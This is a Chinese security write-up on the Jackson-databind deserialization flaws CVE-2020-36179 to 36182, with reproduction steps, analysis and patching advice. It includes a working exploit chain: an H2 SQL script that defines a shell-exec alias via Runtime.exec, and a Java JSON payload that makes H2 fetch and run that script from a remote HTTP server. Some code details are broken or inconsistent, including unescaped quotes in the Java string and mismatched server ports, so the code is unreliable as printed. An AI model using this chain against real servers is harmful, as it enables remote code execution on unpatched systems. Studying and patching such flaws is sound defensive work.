影响范围
Jackson-databind < 2.9.10.7
漏洞类型
JDNI注入导致RCE
利用条件
-
开启enableDefaultTyping()
-
使用了org.apache.servicemix.bundles第三方依赖库
漏洞概述
以下类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成SSRF&RCE:
-
CVE-2020-36179:org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS
-
CVE-2020-36180: org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS
-
CVE-2020-36181: org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS
-
CVE-2020-36182: org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS
漏洞复现
环境搭建
pom.xml
<project xmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"><modelVersion>4.0.0</modelVersion><groupId>com.jacksonTest</groupId><artifactId>jacksonTest</artifactId><version>1.0-SNAPSHOT</version><dependencies><dependency><groupId>com.fasterxml.jackson.core</groupId><artifactId>jackson-databind</artifactId><version>2.9.10.7</version></dependency><!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 --><dependency><groupId>org.apache.commons</groupId><artifactId>commons-dbcp2</artifactId><version>2.8.0</version></dependency><!-- https://mvnrepository.com/artifact/com.h2database/h2 --><dependency><groupId>com.h2database</groupId><artifactId>h2</artifactId><version>1.4.199</version></dependency><dependency><groupId>org.slf4j</groupId><artifactId>slf4j-nop</artifactId><version>1.7.2</version></dependency><!-- https://mvnrepository.com/artifact/javax.transaction/jta --><dependency><groupId>javax.transaction</groupId><artifactId>jta</artifactId><version>1.1</version></dependency></dependencies></project>
漏洞利用
https://github.com/Al1ex/CVE-2020-36179
构造exec.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A");return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('calc.exe')
简易web服务
python2 -m simpleHTTPServer 4444
执行漏洞POC1
poc.java代码如下所示:
import com.fasterxml.jackson.databind.ObjectMapper;import com.fasterxml.jackson.databind.SerializationFeature;public class POC {public static void main(String[] args) throws Exception {String payload = "["org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:3333/exec.sql'"}]";ObjectMapper mapper = new ObjectMapper();mapper.enableDefaultTyping();mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);Object obj = mapper.readValue(payload, Object.class);mapper.writeValueAsString(obj);}}
之后运行该程序,成功执行命令,弹出计算器:
漏洞分析
org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS类中提供了对url的set方法,可以通过反序列化进行赋值操作,同时在getConnection中通过DriverManager.getConnection()进行远程连接,参数url可控,从而可导致SSRF,当classpath中存在h2数据库时甚至可以导致RCE:
Gadget如下:
DriverAdapterCPDS->seturl->getPooledConnection->DirverManager.getConnection(this.url,username,pass)
修复建议
-
及时将jackson-databind升级到安全版本(>2.9.10.7)
-
升级到较高版本的JDK
原文始发于微信公众号(七芒星实验室):CVE-2020-36179/80/81/82:Jackson-databind SSRF&RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论